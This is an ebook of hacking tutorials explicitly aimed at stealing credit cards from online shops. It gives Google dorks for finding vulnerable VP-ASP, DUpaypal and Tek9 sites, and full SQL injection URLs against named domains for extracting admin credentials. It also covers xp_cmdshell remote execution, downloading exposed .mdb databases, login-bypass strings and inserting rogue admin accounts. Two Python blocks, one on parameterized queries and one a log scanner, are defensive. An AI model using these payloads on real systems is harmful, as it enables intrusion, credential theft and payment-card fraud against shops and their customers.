
This ebook was written for the purpose of learning and sharing knowledge. Email: hieuitpc@yahoo.com Homepage: http://cntt.pro.vn

Contents of the ebook: two tutorials written by hieupc and a few other tutorials written by friends; some of them are old, but they are still well worth including for reference.

Hacking Credit Card Version 2.0 --- Written by Hieupc


shopdisplayproducts.asp?cat='
After the long time since TTD was broken up, hieupc has only now started writing a new tutorial on hacking credit cards, and this is probably the last and most complete one: hieupc compiled it, collecting material from many tutorials old and new into one ebook, answered the questions you have been asking, and so put together a "hacking credit card" ebook. Now let's begin. Like the usual methods, this one exploits a SQL bug, and it can also be applied to some other bugs, such as OLE DB, JET Database and ASP errors.

Step 1:
I recommend searching for shops on www.google.com or www.search.com, because I find those two sites very good. Keywords to use: allinurl:shopdisplayproducts.asp?id= or allinurl:shopdisplayproducts.asp?cat=1 or allinurl:shopdisplayproducts.asp?cat=2. To search for shops by domain (.com, .net, .biz, ...): allinurl:.com/shopdisplayproducts.asp?cat=, allinurl:.net/shopdisplayproducts.asp?cat=, and so on; if you know any other TLD, substitute it :). The chance of getting credit cards is 99.9%; the remaining 0.1% depends on your own head. Once the search is done, collect all the vulnerable shops and start hacking.

Step 2:
Example: take a site of this form: http://www.victim.com http://www.victim.com/shopdisplayproducts.asp?id=5 We add a single quote ( ' ) after the 5: http://www.victim.com/shopdisplayproducts.asp?id=5' Let's see whether it throws an error. Hmm, no error, we only see this:
Home Improvement Page 1 of 2

No problem, let's stay calm and try replacing id with cat: http://www.victim.com/shopdisplayproducts.asp?id=5' -->>> http://www.victim.com/shopdisplayproducts.asp?cat=5' There, now it errors:
5' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c. catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467

Okay, let's continue: you add the following code: '%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password

to http://www.victim.com/shopdisplayproducts.asp?id=5'

After adding it, it looks like this: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password and you will see this:


5' union select 1 from tbluser"having 1=1--sp_password Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 467

Note, everyone: the single quote ( ' ) is very important; without it, it won't work. And so we keep adding numbers: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2%20from%20tbluser"having%201=1--sp_password

http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3%20from%20tbluser"having%201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3,4%20from%20tbluser"having%201=1--sp_password Keep going like that until you see a nice table appear with a few numbers in it. Here it was at number 47: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password
3 click to see more 22 4

18 Please review these other products:

Now let's start getting the user and pass:

fldusername: put it in place of number 3, or 4, or 22, as you like. fldpassword: put it in place of number 3, or 4, or 22, as you like.

After adding them we have this: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password And we get the username and password:
User: stephenrossi pass: gnilsur

Or you can combine fldusername and fldpassword into a single number: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername%2b'/'%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password We get the user and pass combined in one number:
stephenrossi/gnilsur

Step 3:
Find the admin link. Let's try whether this one works: http://www.victim.com/shopadmin.asp Hmm, no luck. Try this one too, maybe it leads to the admin link: http://www.victim.com/shopadmin1.asp No luck either. For this, hieupc downloaded the VPASP source to see how it is structured, and found the following statement; it is just a matter of changing the table. We know that the configuration table is where the shop's important information is kept, such as the admin link, afftemplateaffiliate, afftemplateMerchant, and so on. So the statement is: '%20union%20%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Substituting it in we get: http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password And again we see the table:
3 click to see more 22 4

18 Please review these other products:

This time we will look for the admin link. Usually the admin link is in fieldvalue, so we put fieldvalue in place of number 3, or 4, or 22, as you like: '%20union%20%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password After adding it we have this: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password

You won't see the admin link anywhere; it is all just numbers. At first hieupc also thought he had written the statement wrong, but after fiddling for a while, scrolling the page up and down, it turned out there were 10 pages.
Page 1 of 10

You only need to see it. To add: each such page holds the information in fieldvalue, so try to view every page. hieupc viewed all 10 pages and collected the links ending in *.asp:
shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp

One of these 3 links is certainly the admin login link. hieupc tried all 3, and the first one is the admin link:
shopaddmoretocart.asp

http://www.victim.com/shopaddmoretocart.asp
This site is reserved for Shop Administrators only. Administrator's Login UserName : Password :

Now put in the username and password from above. I am sure you know the rest.


THE END

Hacking Credit Card Version 1.0 --- Written by Hieupc


What is hacking a VPASP shop really like? (Updated and further developed from many earlier guides)
METHOD 1: Many of you probably know this one already; if I am not mistaken only 30%-50% of members know it, but I am posting it here anyway for those who don't know it yet, and so that those who do can learn from me or add to the parts I haven't finished! Like the usual methods, this one exploits a SQL bug, and it can also be applied to some other bugs such as OLE DB, JET Database and ASP errors.
Step 1: finding a site with this kind of bug requires plenty of experience in finding bugs and in searching for shops effectively. This step is also the most important one, because without a vulnerable shop, what is there to hack :)) I recommend searching for shops on www.google.com or www.search.com, because I find those two sites very good. Keywords to use: allinurl:shopdisplayproducts.asp?id= or allinurl:shopdisplayproducts.asp?id=1 or allinurl:shopdisplayproducts.asp?id=2. To search for shops by domain (.com, .net, .biz, ...): allinurl:.com/shopdisplayproducts.asp?id= ; allinurl:.net/shopdisplayproducts.asp?id=... If you know any other TLD, substitute it :). Once the search is done, collect all the vulnerable shops and start hacking. Now let me take this shop as the example: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1 Oh, a very tasty UK one, let's see if it has CCs. Now check whether it is vulnerable by adding a single quote ( ' ): http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1' Oh, the site is vulnerable, look:

Products

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'. /chris/shop$db.asp, line 868

Step 2: We start by adding this code: %20union%20%20select%201%20from%20tbluser%27 after the shop link; remember to drop the quote after ?id=1, otherwise it won't work.

After adding it the link looks like this: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from%20tbluser%27 Oh, this one is not easy :)

Products
Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match. /chris/shop$db.asp, line 868

I don't know yet whether we get to step 3, but wait, first look at my experience with the case where adding the single quote ( ' ) produces an error like this one:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ' '. /product.asp, line 29

In that case, hack it the old way. OK, now on to step 3, I have been talking too much :)) After finishing step 2, you begin the most sacred and also the most tiring task; well, not tiring, just a little achy: adding numbers to the code: 1%20union%20%20select%201,2%20from%20tbluser%27 1%20union%20%20select%201,2,3%20from%20tbluser%27 1%20union%20%20select%201,2,3,4%20from%20tbluser%27.. After adding them the link looks like this: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2%20from%20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3%20from%20tbluser%27

http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4%20from%20tbluser%27 Keep adding numbers; don't lose heart, keep going, until a very nice table appears :)) Ouch, my hand is tired; only at number 34 did this wretched table finally show up :)) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser%27 This is the final step, getting the user and pass. The other important numbers for the shop are: 3, 4, 22. fldusername <~ put in place of number 4 fldpassword <~ put in place of number 22 After substituting, the link looks like this: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser%27

And here you have the user and pass:

User: admin848 pass: admin848 User: carste pass: carste

What remains is to find the admin login link; this is also quite important, because without the admin link how do you get the CCs :)) Note: the default VPASP admin login link is shopadmin.asp; sometimes typing shopadmin1.asp gets you to the admin link as well.
METHOD 2, DRAWN FROM THE GUIDE BY BIG BROTHER Silveryhat_Hacker: Step 1 is the same as above:

For example this site: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153' Again add the single quote ( ' ) to check for the bug:

Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /shopping/shopdisplayproducts.asp, line 93

Oh, there is the error; what now :)) You know how to exploit this one: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93

Step 2 you probably know; it is just a matter of getting the tables, and I only need to find the table that holds the admin users: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('ver_Faq','coupons','customerprices','customers')))--sp_password

Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93

At this point it is obvious: the one I choose is this table, 'AdminUsers', because it holds the user and pass, of course. Let's go ahead and exploit it. Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')))--sp_password After adding the code it looks like this: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')))--sp_password

Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminID' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93

And the next step. Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and%20column_name%20not%20in%20('AdminID')))--sp_password After adding the code it looks like this: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and%20column_name%20not%20in%20('AdminID')))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93

And you keep adding column names: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and%20column_name%20not%20in%20('AdminID','login')))--sp_password http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and%20column_name%20not%20in%20('AdminID','login','pwd')))--sp_password Okay, the 2 important pieces of information, 'login' and 'pwd', have appeared; now it is just a matter of getting the pass. Code: %20and%201=convert(int,(select%20top%201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password And we get a seriously juicy shop: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password

Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin/admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93

Hic hic, user: admin, pass: admin; that tells you how dumb this shop's admin is. Now finding the admin link is your job.

TUTORIALS OF MY FRIENDS OR OTHER AUTHORS


Tutorial written by kidbandes

What you should look for? (The purpose of looking for the bug)
Find pages that let you enter data, for example a login page, a search page, .... Sometimes an HTML page uses the "POST" command to send parameters to another ASP page, so you cannot see the parameters in the URL bar; look at the "FORM" tag in the HTML code instead. You may find something like the following code: <FORM action=Search/search.asp method=post> <input type=hidden name=A value=C> </FORM> Everything between <FORM> and </FORM> carries parameters that may be used.

What if you can't find any page that takes input? (What do you do if you cannot find any page that takes input?)
You should look for pages such as ASP, JSP, CGI or PHP. Try to find URLs with parameters like this one: http://shopping.com/index.asp?id=10

How do you test if it is vulnerable? (How do we test for the bug)
Start with a single quote, adding it like this: hi' or 1=1-- Enter it into the login or password field, or even into the URL. - login: hi' or 1=1-- password: hi' or 1=1-- http://shopping.com/index.asp?id=hi' or 1=1--

If you have to do this with a hidden value, download the HTML source from the site, save it to your hard disk and edit the URL and the hidden value. For example: <form action=http://shopping.com/search/search.asp method=post> <input type=hidden name=A value="hi' or 1=1--"> </form> If you are lucky, you will be logged in to the site without a login name or password. But why use ' or 1=1--? Let's look at another example of why ' or 1=1-- is important. Apart from bypassing the login, it can also reveal more data than the ordinary information. Take an ASP page with a link like this: http://shopping.com/index.asp?category=food In the URL, 'category' is a variable name and 'food' is the value assigned to that variable. In that case, the ASP page may contain code like the following (OK, this code was written for this article):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, the variable is wrapped inside v_cat, so the SQL statement becomes: SELECT * FROM product WHERE PCategory='food' The query above returns all rows whose PCategory field is 'food'. Now the query becomes: http://shopping.com/index.asp?category=food' or 1=1-- Now the value of v_cat is "food' or 1=1-- ", and if we translate it into the SQL statement we get: SELECT * FROM product WHERE PCategory='food' or 1=1--' The query then no longer restricts the result to rows whose PCategory is 'food'. The "--" makes MSSQL ignore the rest of the query. Sometimes we can also use "#". However, if the system does not run MSSQL, or simply to make an ordinary query, we only need to use ' or 'a'='a The SQL statement will be: SELECT * FROM product WHERE PCategory='food' or 'a'='a' Depending on the query, we use the following values: ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a
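To show the point of the ASP snippet in running code, here is an added example (it is not code from kidbandes' tutorial or from any shop software) that rebuilds the snippet's query in Python against an in-memory SQLite table and puts the parameterized version beside it. The product rows are constructed for the example; SQLite stands in for MS SQL because it runs anywhere, and for this purpose its quoting rules and "--" comment behave the same way.

```python
import sqlite3

# Constructed sample catalogue; the table and column names follow the
# tutorial's ASP snippet (product / PCategory), the rows are made up.
SAMPLE_ROWS = [
    ("apple", "food"),
    ("bread", "food"),
    ("hammer", "tools"),
    ("router", "electronics"),
]


def make_db():
    """Build the in-memory table the queries below run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (pname TEXT, PCategory TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, v_cat):
    """Same construction as sqlstr = "SELECT ... WHERE PCategory='" & v_cat & "'".
    The request value is spliced into the statement text, so a quote in it
    ends the string literal and whatever follows is parsed as SQL."""
    sqlstr = "SELECT pname FROM product WHERE PCategory='" + v_cat + "'"
    return sorted(row[0] for row in conn.execute(sqlstr))


def lookup_parameterized(conn, v_cat):
    """Hardened form: the value travels as a bound parameter, never as SQL text.
    Quotes, 'or 1=1' and '--' inside it are compared literally with PCategory."""
    rows = conn.execute("SELECT pname FROM product WHERE PCategory=?", (v_cat,))
    return sorted(row[0] for row in rows)


def vulnerable_error_text(conn, v_cat):
    """Return the raw driver error the concatenated query produces, or None.
    This is the text that error-based probing reads; a production handler
    should log it server-side and send the client a generic error page."""
    try:
        lookup_vulnerable(conn, v_cat)
        return None
    except sqlite3.Error as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    for probe in ("food", "food' or 1=1--", "' or 'a'='a"):
        print(repr(probe), lookup_vulnerable(db, probe), lookup_parameterized(db, probe))
    print(vulnerable_error_text(db, "hi'"))
```

With the plain value "food" both functions return the two food rows; with "food' or 1=1--" or "' or 'a'='a" the concatenated query returns the whole table while the parameterized one returns nothing, and a lone quote makes only the concatenated query raise a driver error.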

How do I get remote execution with SQL injection? (Method of executing commands remotely with SQL)
Being able to inject a SQL statement means we can execute commands. A default installation of MS SQL runs under the SYSTEM account, a user with Administrator-level access. We can use the stored procedure master..xp_cmdshell to execute commands remotely: '; exec master..xp_cmdshell 'ping 10.10.1.2'-- Try the double quote (") if the single quote (') does not work. The two dashes at the end of the command allow a new SQL statement to be run. To check that the command was executed, you can listen for ICMP packets from 10.10.1.2, checking for any packet from the server: #tcpdump icmp If you do not receive any packet from the server and instead get an error message saying you have no permission, the Administrator has probably restricted the user's access to the system.

How to get output of my SQL query? (Method of getting the result of a SQL query)
If possible, use sp_makewebtask to write the query out as HTML: '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES" But the IP address must have a share open to everyone.

How to get data from the database using ODBC error message (Method of getting data from the DB using ODBC errors)
We use the error handling of MS SQL Server to execute commands. Look at this example: http://shopping.com/index.asp?id=10 We try to UNION the integer '10' with another statement: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- The system table INFORMATION_SCHEMA.TABLES holds information about every table in the system. Its TABLE_NAME field holds the name of every table in the system. It always exists by default. The query will be:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- This returns the first table in INFORMATION_SCHEMA.TABLES. When we UNION this value with the integer 10, MS SQL Server tries to convert the string (nvarchar) value into an integer. That fails, because nvarchar cannot be converted to int, and the server shows the following error: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5 The error message says the string value could not be converted to a number. In this case, we have obtained the name of the first table, "table1". To get the next table, we can use the following command: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')-- We can also use LIKE: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. /index.asp, line 5 The matching value, '%25login%25', is seen as %login% by SQL Server. In this case we get the first table name that matches the pattern, "admin_login".

How to mine all column names of a table? (How to get all the column names of a table)
We can use another table, INFORMATION_SCHEMA.COLUMNS, to map all the columns of a table: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. /index.asp, line 5 Now that we have the first column in the table, we use NOT IN () to get the next column: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5 As we continue we obtain some useful columns such as "password" and "details". We know we have them all when we use the following query: Quote: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')-- Output: Quote: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. /index.asp, line 5

How to retrieve any data we want? (Method of getting any data we want)
Now we look at some important tables and their fields; we use the same technique as above to get the data we need from the DB. First we get the first value of the login_name column from the "admin_login" table: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'kidbandes' to a column of data type int. /index.asp, line 5 The admin user name is "kidbandes". Finally we get the password of "kidbandes" from the DB: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='kidbandes'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'loverthu' to a column of data type int. /index.asp, line 5 Now we can log in with the name "kidbandes" and the password "lovethu".

How to get numeric string value? (Method of getting a numeric string value)
There is a limitation to the technique above. We cannot get any error message if we try to convert text that consists only of digits (the characters 0-9). Let's try to get the password of "kimthu", which is the number "123456": http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'-- Usually we just get a "Page Not Found" message. The reason is that the password of "kimthu", "123456", can be converted to a number before the UNION with the integer (10 in this case). Because it is a valid UNION statement, SQL Server does not throw an ODBC error, and so we cannot get the error message. To solve this, we append a text character to make the query fail. We try the following query: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20anhyeuem') FROM admin_login where login_name='trinity'-- We use the (+) sign to combine the password with the string value we want (the ASCII code for '+' is 0x2b). We combine it with '(space)morpheus' to form a new password. So even with a numeric password '123456', it becomes '123456 anhyeuem' simply by calling convert(); when it then tries to convert '123456 anhyeuem' into a number, SQL Server shows an ODBC error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '123456 anhyeuem' to a column of data type int. /index.asp, line 5

How to update/insert data into the database? (Method of updating/inserting data into the DB)
Once we have succeeded in collecting information from the DB, it means we can UPDATE or even INSERT a new record into the table. For example we can change the password of "kidbandes": http://shopping.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'lovethu' WHERE login_name='kidbandes'-- To INSERT new data into the DB: http://shopping.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'kidbandes2','lovethu','NA')-- Now we can log in as "kidbandes2" with the password "lovethu".
date: 29/05/2005 Author: kidbandes, newbie of Thecorrs Family

Danger level: fairly high. Success rate: 80%. Tools: + the site http://google.com.vn/ + your PC with Access installed (used to view .mdb files). At present there are very many DUpaypal shops and hardly any have been fixed; the proof is that if you attack 10 sites, 8 of them are hit :D) Procedure: go to http://google.com.vn/ and search with the keyword "Powered by DUpaypal -siteduware.com"; you will see very many sites with this bug. Which victim to test? kieptinhchung picks this one: http://www.xcel-leadership.com/sermon/deta...ro=147&iType=18 Now add after it: ../_private/DUpaypal.mdb Download the file holding the admin's U/P, that is, we use the following link to download it: http://www.xcel-leadership.com/sermon/_private/DUpaypal.mdb After downloading it, open it in Access, find the User section and take the user+pass to log in very easily; and with that you own the shop.
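As an added defensive companion to the two hieupc tutorials and the DUpaypal write-up above (this is not code from the ebook, from VP-ASP or from DUpaypal), here is a small scanner over IIS W3C-style log lines that flags the request shapes those write-ups rely on: UNION SELECT column probing, convert(int,(select ...)) error-based probing of information_schema, the sp_password marker appended so that SQL Server omits the statement from its trace, and direct downloads of .mdb database files. The log lines, addresses and paths are constructed for the example, and the field layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is an assumption to be matched against the real #Fields header.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# The probes copy the shapes shown in the tutorials; hosts and addresses are fictitious.
SAMPLE_LOG = """\
2005-06-01 10:00:01 203.0.113.5 GET /shopdisplayproducts.asp id=5 200
2005-06-01 10:00:07 203.0.113.5 GET /shopdisplayproducts.asp cat=5' 500
2005-06-01 10:00:19 203.0.113.5 GET /shopdisplayproducts.asp cat='%20union%20%20select%201,2,3%20from%20tbluser"having%201=1--sp_password 500
2005-06-01 10:00:31 203.0.113.5 GET /shopdisplayproducts.asp cat='%20union%20%20select%201,2,3,fldusername,5%20from%20tbluser"having%201=1--sp_password 200
2005-06-01 10:01:02 198.51.100.9 GET /shopping/shopdisplayproducts.asp id=153%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password 500
2005-06-01 10:02:10 198.51.100.9 GET /sermon/_private/DUpaypal.mdb - 200
2005-06-01 10:03:00 192.0.2.77 GET /shopdisplayproducts.asp cat=12 200
"""

# Strong indicators, applied to the URL-decoded, lower-cased query string.
QUERY_RULES = [
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("error_based_cast", re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b")),
    ("schema_enum", re.compile(r"information_schema\.(?:tables|columns)")),
    ("trace_evasion", re.compile(r"sp_password")),
]
# A request for an Access database file itself, applied to the decoded URI stem.
DB_FILE_RULE = re.compile(r"\.mdb$")


def parse_line(line):
    """Split one log line into its fields; return None for lines that do not fit."""
    fields = line.split()
    if len(fields) != 7:
        return None
    _date, _time, c_ip, method, stem, query, status = fields
    return {
        "ip": c_ip,
        "method": method,
        "stem": unquote_plus(stem).lower(),
        "query": unquote_plus(query).lower(),
        "status": int(status),
    }


def classify(entry):
    """Return the names of every rule the entry matches, in rule order."""
    hits = [name for name, rx in QUERY_RULES if rx.search(entry["query"])]
    if DB_FILE_RULE.search(entry["stem"]):
        hits.append("db_file_download")
    # Weak signal on its own: a quote in the query that produced a server error.
    if "'" in entry["query"] and entry["status"] >= 500:
        hits.append("quote_with_error")
    return hits


def scan(log_text):
    """Return (client ip, uri stem, rule names) for every flagged line."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append((entry["ip"], entry["stem"], hits))
    return findings


def count_by_ip(findings):
    """Number of flagged requests per client, to spot the probing host."""
    counts = {}
    for ip, _stem, _hits in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for ip, stem, hits in results:
        print(ip, stem, ",".join(hits))
    print(count_by_ip(results))
```

On the sample log the two plain catalogue requests pass, the quote probe is reported only as the weak signal, the UNION and convert() probes are reported with the sp_password marker, and the .mdb request is reported on its own; the per-client count shows which address is doing the probing.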

TUTORIAL FROM jonnyhackstuff

TUTORIAL BY HCEGROUP

I - The Tek9.asp bug
How to find: use Google. Search string: tek9.asp Result: you find the pages listed, for example http://198.170.250.68/tek9_login.asp Add intranet in front of tek9.asp: http://198.170.250.68/intranet/tek9_login.asp What do you get? You reach the administrator's login page. Username and password: both are 'or''=' And then? Find out for yourself, since each page is laid out a little differently. The page above lets you manage parameters, types, methods and a few items relating to the database that holds the credit cards. You can also look for the Find orders command to locate the card area.
============================
II - The Cart32 v3.5a bug
